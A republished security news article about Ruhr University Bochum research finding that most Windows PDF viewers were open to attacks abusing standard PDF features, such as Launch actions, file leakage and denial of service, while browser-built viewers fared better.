Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Pwnable Document Format: Windows PDF viewers outperformed by browser, macOS, Linux counterparts

The vast majority of the most popular Windows-native PDF viewers were vulnerable to multiple attack techniques exploiting standard PDF features, a team of security researchers has discovered.

Several PDF software brands were vulnerable to the most serious attacks, which resulted in local file leakage, file write access, and remote code execution (RCE), academics from Ruhr University Bochum in Germany found.

PDF viewers built into leading web browsers and applications for macOS and Linux were only susceptible to comparatively trivial attacks such as denial of service (DoS).

The viewers incorporated into Safari and Edge, meanwhile, were the only applications among 28 tested to resist all exploits, which targeted features that “directly or indirectly allow access to a file handle”, as a blog post explains.

Susceptible to eight of 10 attack techniques, the worst culprits overall were PDF-Xchange Viewer and PDF-Xchange Viewer for Windows.

PDFelement and iSkysoft, prone only to DoS, were honorable exceptions to the otherwise unimpressive Windows scorecard.

‘Code execution by design’

“I was surprised how many viewers did straightforwardly implement ‘code execution by design’ – because they simply followed the PDF reference and thereby introduced a dangerous feature (the ‘Launch action’) without, [for example], correctly asking the user for confirmation,” Jens Müller, one of the researchers, told The Daily Swig.

As a result, the blog post describes how a malicious file could successfully “be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself” against six of 18 Windows viewers probed.

Information disclosure attacks, meanwhile, could be used to track PDF document use “by silently invoking a connection to the attacker’s server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker”.

The most dangerous technique, successfully deployed against three Windows viewers and partially successful against another three, exploited various methods defined by the PDF standard for embedding external files or accessing files on the host’s file system.

“If a malicious document managed to firstly read files from the victim’s disk and secondly, send them back to the attacker, such behavior would arguably be critical,” reads the blog post.

Data manipulation attacks

Data manipulation attacks involved silently modifying form data, displaying different content depending on the application used to open the document, and exploiting ambiguity in how the PDF standard allows form data submission to external webservers in order to write to local files on the host’s file system.

Attackers successfully executed one or both DoS techniques against every single application, bar the Safari and Edge viewers. This included exploiting how document elements reference themselves and other similar elements to cause an ‘infinite loop’, and a twist on the ‘zip bomb’ attack that compresses stream objects rather than zip files.

‘A better choice’

Müller said the “more severe issues should be fixed by now”, while “less impactful issues such as form modification are basically features”, and will therefore not likely be remedied.

He suggests that applications built into browsers, which offer sandboxing protections, “may be a better choice for a suspicious document than a native third-party PDF viewer”.

Advertisement. Scroll to continue reading.

The research also highlights an education gap around the risks posed by what Müller refers to as “a quite complex data format with tons of interesting features”.

“For example, people are aware that Office files (e.g in email attachments) can contain macros, but public knowledge of similar functionality in PDF documents is less widespread,” he noted.

The other researchers involved are Dominik Noss, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

Source: https://portswigger.net/daily-swig/pwnable-document-format-windows-pdf-viewers-outperformed-by-browser-macos-linux-counterparts

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month. The framework means that well-intentioned security researchers are free...

Cyber Security

Twitter faced further criticism this week when Elon Musk’s social networking platform announced SMS-based 2FA will only be available to paying customers going forward....

Cyber Security

HAProxy, the popular open source load balancer and reverse proxy, has patched a bug that could enable attackers to stage HTTP request smuggling attacks. By sending a maliciously...

Cyber Security

KeePass has become the latest password manager utility obliged to defend its reputation following the discovery of an alleged vulnerability. Security researchers warned that it might be...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO